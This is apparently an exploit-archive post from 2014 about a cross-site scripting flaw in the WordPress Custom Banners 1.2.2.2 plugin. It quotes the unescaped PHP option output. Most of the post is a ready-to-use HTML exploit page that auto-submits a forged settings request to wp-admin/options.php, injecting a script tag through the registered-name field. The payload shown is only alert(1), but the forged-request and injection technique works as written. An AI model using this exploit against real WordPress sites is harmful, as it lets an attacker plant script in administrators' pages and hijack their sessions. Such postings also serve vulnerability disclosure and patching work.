Home / exploits WordPress Custom Banners 1.2.2.2 Cross Site Scripting
Posted on 01 July 2014
###################### # Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/custom-banners/ # Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip # Date : 2014-06-28 # Tested on : Windows 7 / Mozilla Firefox ###################### # Vulnerable code : <table class="form-table"> <tr valign="top"> <th scope="row"><label for="custom_banners_registered_name">Email Address</label></th> <td><input type="text" name="custom_banners_registered_name" id="custom_banners_registered_name" value="<?php echo get_option('custom_banners_registered_name'); ?>" style="width: 250px" /> <p class="description">This is the e-mail address that you used when you registered the plugin.</p> </td> </tr> </table> ###################### Exploit Code: <html> <body> <form name="post_form" method="post" action="http://localhost/wp-admin/options.php"> <input type='hidden' name='option_page' value='custom-banners-settings-group' /><input type="hidden" name="action" value="update" /><input type="hidden" id="_wpnonce" name="_wpnonce" value="8fcfa93c1a" /><input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=custom-banners%2Flib%2Fcustom_banners_options.php&settings-updated=true" /> <input type="hidden" name="custom_banners_registered_name" id="custom_banners_registered_name" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('post_form.submit()', 1); </script> </form> </body> </html> ##################### Discovered By : ACC3SS #####################
